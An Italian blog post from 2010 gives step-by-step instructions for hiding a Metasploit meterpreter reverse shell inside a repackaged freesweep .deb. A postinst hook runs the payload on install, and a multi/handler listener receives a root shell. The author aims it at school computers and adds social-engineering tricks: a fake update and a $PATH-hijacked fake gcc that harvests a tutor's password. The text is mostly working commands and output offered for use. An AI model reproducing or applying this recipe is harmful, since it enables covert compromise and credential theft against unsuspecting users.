[METASPLOIT]Attack Linux and open remote Shell

Ormai Linux e Mac vengono sempre più usati, perchè “sicuri”.

In questo modo, gli utenti si permettono di aprire qualsiasi pacchetto mettono la password per aumentare i privilegi, ad ogni richiesta
e così si possono fottere facilmente.

A scuola da me hanno messo Linux e non ho tempo purtroppo di cambiare la password al boot oppure di azzerare la password sempre dell’account root…

Vediamo come creare un pacchetto deb che ci apre una shell con remota con metasploit, e anche come fare un po’ social :D

Entriamo nella directory di metasploit :D

nel mio caso:
cd $HOME/msf3
Ora scarichiamo un pacchetto deb da modificare, ad esempio io ho scaricato:
freesweep

Quindi:
sudo apt-get --download-only install freesweep
Creiamo la cartella dove risiederà il nuovo nostro deb :D
sudo mkdir evil
Spostiamo il file precedentemente scaricato nella directory appena creata:
Il nome del pacchetto può cambiare a seconda della versione aggiornata o meno ;)
sudo mv /var/cache/apt/archives/freesweep_0.90-2_i386.deb evil
cd evil
Scompattiamo il deb nella cartella WORK:
sudo dpkg -x freesweep_0.90-2_i386.deb work
Ora creiamo il file che eseguirà la nostra shell:
sudo mkdir work/DEBIAN

cd work/DEB*
Creiamo il file control:
sudo -s
echo "Package: freesweep" > control
echo "Version: 0.90-2 " >> control
echo "Section: Games and Amusement " >> control
echo "Priority: optional " >> control
echo "Architecture: i386 " >> control
echo "Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)" >> control
echo "Description: a text-based minesweeper" >> control
echo " Freesweep is an implementation of the popular minesweeper game" >> control

Che alla fine sarà così:
root@cls:~/msf3/evil/work/DEBIAN# cat control
Package: freesweep
Version: 0.90-2
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game

Ora creiamo il file che verrà eseguito dopo l’installazzione, denominato:
postinst
echo '#!/bin/sh' > postinst
echo "sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &" >> postinst
Sarà così dopo:
root@cls:~/msf3/evil/work/DEBIAN# cat postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

Ora creiamo il file :D
Andiamo nella dir di metasploit:
cd $HOME/msf3
Usiamo la super utility di metasploit :D
./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 X > evil/work/usr/games/freesweep_scores
Come al solito usiamo meterpreter.
root@cls:~/msf3# sudo ./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.21 LPORT=4444 X > evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
Length: 50
Options: LHOST=192.168.1.21,LPORT=4444
Entriamo ancora nella dir work:
cd work/DEB*
Diamo i permessi giusti o.o
chmod 755 postinst
Compiliamo in nostro nuovo pacchetto:
Torniamo in metasploit:
cd $HOME/msf3

dpkg-deb --build evil/work
outpu:
root@cls:~/msf3# dpkg-deb --build evil/work
dpkg-deb: generazione del pacchetto "freesweep" in "evil/work.deb".
root@cls:~/msf3#
Perfetto abbiamo il nostro deb :D

Mettiamoci in ascolto con metasploit( use multi/handler)
Avviamo metasploit:
use multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST IP
exploit

Ora il nostro deb che è situato in evil/work.deb dobbiamo farlo aprire alla vittima…
In questo caso possiamo scaricarlo e farlo eseguire alla vittima oppure falsificando la sua navigazione e facendoli credere che deve fare un update :D

Oppure se a scuola usate gcc o.o potete comprometterlo :D chiamate il tutore e gli chiedete che gcc vi chiede la password lui la inserisce e pff :D

$PATH

Per fare questo si può impostare la $PATH.
Quando noi eseguiamo un comando, ad esempio gcc, lui va in /usr/bin/ vede che c’è gcc e lo esegue :D

Se noi impostiamo che la ricerca la fa in umm /tmp/ verrà eseguito il gcc che è in tmp.
In questo modo nulla verrà sospettato e potremo far credere che è veramente gcc che chiede la password o.o

Comunque, facciamo eseguire il deb alla vittima :D

Quando verrà eseguito il gioco:
msf exploit(handler) >exploit
[*] Started reverse handler on 192.168.1.21:4444
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.21
..
id
uid=0(root) gid=0(root) groups=0(root)

Quindi attenzione ad aprire deb sconosciuti :D

Related posts:

1. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
2. Come installare Metasploit Framework su Ubuntu (e derivati)
3. [Metasploit] multi/handler :D
4. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
5. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution

This entry was posted on Wednesday, September 8th, 2010 at 2:21 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with: attack • deb • hack • linux • metasploit • root